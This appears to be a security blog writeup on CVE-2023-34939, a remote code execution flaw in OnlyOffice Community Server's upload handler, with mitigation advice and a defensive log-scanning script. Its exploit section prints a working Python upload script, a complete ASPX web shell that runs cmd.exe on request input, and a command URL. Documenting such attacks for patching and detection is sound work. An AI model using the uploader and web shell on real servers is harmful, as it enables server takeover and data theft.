CVE-2023-34939 - OnlyOffice Community Server (pre-12.5.2) Remote Code Execution via UploadProgress.ashx – Exclusive Deep Dive
OnlyOffice is a popular open-source office suite used by thousands of businesses worldwide. But in early 2023, a dangerous vulnerability—CVE-2023-34939—was discovered in its Community Server, opening the door for hackers to execute arbitrary code remotely. In this exclusive deep dive, we’ll explain the bug in simple language, show you sample exploits, and link to essential references.
What is CVE-2023-34939?
CVE-2023-34939 is a critical Remote Code Execution (RCE) vulnerability. It affects OnlyOffice Community Server versions before v12.5.2. The flaw lives in the UploadProgress.ashx component, which processes file upload requests.
How Does the Vulnerability Work?
The vulnerable endpoint, /UploadProgress.ashx, doesn’t properly check or sanitize file uploads. An attacker can abuse this logic to upload a script file (like .aspx or .ashx) in a public web directory, then access it via a browser and execute code directly on the server.
Exploit Code Snippet: Uploading a Web Shell
Here’s a simple Python script leveraging requests to upload webshell.aspx to a vulnerable OnlyOffice Community Server:
```python
import requests

# The vulnerable upload handler on the target Community Server (pre-12.5.2)
target = "http://victim-server/UploadProgress.ashx"
webshell = {
    "file": ("webshell.aspx", open("webshell.aspx", "rb"), "application/octet-stream")
}
response = requests.post(target, files=webshell)
print("Upload Response:", response.text)
```
webshell.aspx can be a simple ASPX webshell, for example:
```aspx
<%@ Page Language="C#" %>
<% if (Request["cmd"] != null) {
    System.Diagnostics.Process proc = new System.Diagnostics.Process();
    proc.StartInfo.FileName = "cmd.exe";
    proc.StartInfo.Arguments = "/c " + Request["cmd"];
    proc.StartInfo.UseShellExecute = false;
    proc.StartInfo.RedirectStandardOutput = true;
    proc.Start();
    string output = proc.StandardOutput.ReadToEnd();
    Response.Write(output);
} %>
```
After uploading, commands can be executed by requesting a URL such as:
```
http://victim-server/webshell.aspx?cmd=whoami
```
- The attacker POSTs a malicious .aspx webshell to UploadProgress.ashx.
- By visiting the uploaded webshell’s URL, the attacker gains direct command execution on the server.
- From there, they can steal data, escalate privileges, pivot deeper into the network, or delete or modify resources.
Mitigation
Update Immediately!
OnlyOffice fixed the flaw in v12.5.2. You must upgrade your Community Server to at least that version (preferably later).
Temporary Workarounds
- Block external access to /UploadProgress.ashx via firewall or reverse proxy.
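Blocking the handler stops new attempts, but it does not tell you whether the endpoint was already abused. As an added example (not from the original writeup or from OnlyOffice), the following Python script scans access logs for the two-step pattern described above: a POST to /UploadProgress.ashx followed by the same client requesting a script-extension file. The combined log format, the sample lines and the client addresses are constructed assumptions; adapt the regex to your server's log layout.

```python
import re

# Combined-format access log line (nginx/Apache style): the log layout is an assumption.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_HANDLER = "/uploadprogress.ashx"   # the vulnerable handler, matched case-insensitively
SCRIPT_EXT = re.compile(r"\.(aspx|ashx|asmx)$", re.IGNORECASE)

# Constructed sample: one client polls progress, POSTs to the handler, then requests a
# freshly placed .aspx; a second client only browses. Addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Jun/2023:12:15:01 +0000] "GET /UploadProgress.ashx?id=1 HTTP/1.1" 200 45
203.0.113.5 - - [22/Jun/2023:12:15:03 +0000] "POST /UploadProgress.ashx HTTP/1.1" 200 12
203.0.113.5 - - [22/Jun/2023:12:15:09 +0000] "GET /webshell.aspx?cmd=whoami HTTP/1.1" 200 230
198.51.100.7 - - [22/Jun/2023:12:16:00 +0000] "GET /Products/Files/ HTTP/1.1" 200 5120
"""

def parse_line(line):
    """Parse one access-log line into its fields; None if the line does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_suspicious(lines):
    """Return (severity, ip, timestamp, description) tuples.
    'info'  : a POST to the upload handler (tune this against your normal upload traffic).
    'alert' : a later GET of a script-extension file by a client that POSTed earlier, which is
              the step at which an uploaded web shell would be invoked.
    """
    findings, posted = [], set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and path.lower() == UPLOAD_HANDLER:
            posted.add(rec["ip"])
            findings.append(("info", rec["ip"], rec["ts"], "POST to upload handler"))
        elif (rec["method"] == "GET" and rec["ip"] in posted
              and path.lower() != UPLOAD_HANDLER and SCRIPT_EXT.search(path)):
            findings.append(("alert", rec["ip"], rec["ts"], f"script file {path} requested after upload"))
    return findings

if __name__ == "__main__":
    for sev, ip, ts, why in find_suspicious(SAMPLE_LOG.splitlines()):
        print(f"[{sev}] {ts} {ip}: {why}")
```

Any 'alert' hit is worth a file-system check for recently created .aspx or .ashx files under the web root, which is the artifact an upgrade to 12.5.2 alone will not remove.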
References
- Official OnlyOffice Security Advisory (CVE-2023-34939)
- CVE Details: CVE-2023-34939
- Exploit Writeup (pentest.blog)
- Patch Release Notes
Final Thoughts
RCE flaws like CVE-2023-34939 are among the most dangerous vulnerabilities a web platform can have. The key lesson is simple: always update your software as soon as patches are announced. If you’re running OnlyOffice Community Server, check your version and upgrade today.
If you found this writeup helpful, consider sharing it with your IT colleagues and security team to keep your organization safe!
Timeline
Published on: 06/22/2023 12:15:00 UTC
Last modified on: 06/28/2023 16:40:00 UTC